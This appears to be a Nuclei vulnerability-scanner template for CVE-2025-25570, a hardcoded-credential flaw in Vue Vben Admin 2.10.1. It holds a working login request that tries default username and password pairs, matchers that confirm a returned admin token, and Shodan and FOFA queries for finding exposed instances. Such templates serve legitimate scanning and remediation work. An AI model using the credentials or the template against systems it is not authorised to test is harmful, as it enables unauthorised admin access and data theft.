id: CVE-2025-25570 info: name: Vue Vben Admin - Default Credentials author: 0x_Akoko severity: critical description: | Vue Vben Admin 2.10.1 contains a broken authentication caused by hardcoded credentials in the backend, letting attackers log in without proper authorization, exploit requires access to the login interface. impact: | Attackers can gain unauthorized access to the backend, potentially leading to data theft or system control remediation: | Remove hardcoded credentials and implement proper authentication mechanisms, update to the latest version if available. reference: - https://github.com/vbenjs/vue-vben-admin - https://doc.vvbin.cn/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-25570 epss-score: 0.01999 epss-percentile: 0.78634 cwe-id: CWE-798 metadata: verified: true max-request: 2 shodan-query: http.html:"vben" || http.html:"vue-vben-admin" fofa-query: body="vben" || body="vue-vben-admin" tags: cve,cve2025,vben,vue,default-login,credentials http: - raw: - | POST {{BaseURL}}/basic-api/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"username":"{{username}}","password":"{{password}}"} attack: clusterbomb payloads: username: - "vben" - "test" password: - "123456" stop-at-first-match: true matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "\"code\":0", "\"type\":\"success\"", "\"result\":", "\"token\":")' - 'contains_any(body, "Vben Admin", "Super Admin")' condition: and # digest: 4a0a00473045022100938ad7cbb772ce0ea763bb46a4bf382792c81ffc140513c9469779dd8761ae1902201e82cea95ace0f9fa9956a7d895ca34b370e9244691f9f5a864cca6a87ab95e8:922c64590222798bb761d5b6d8e72950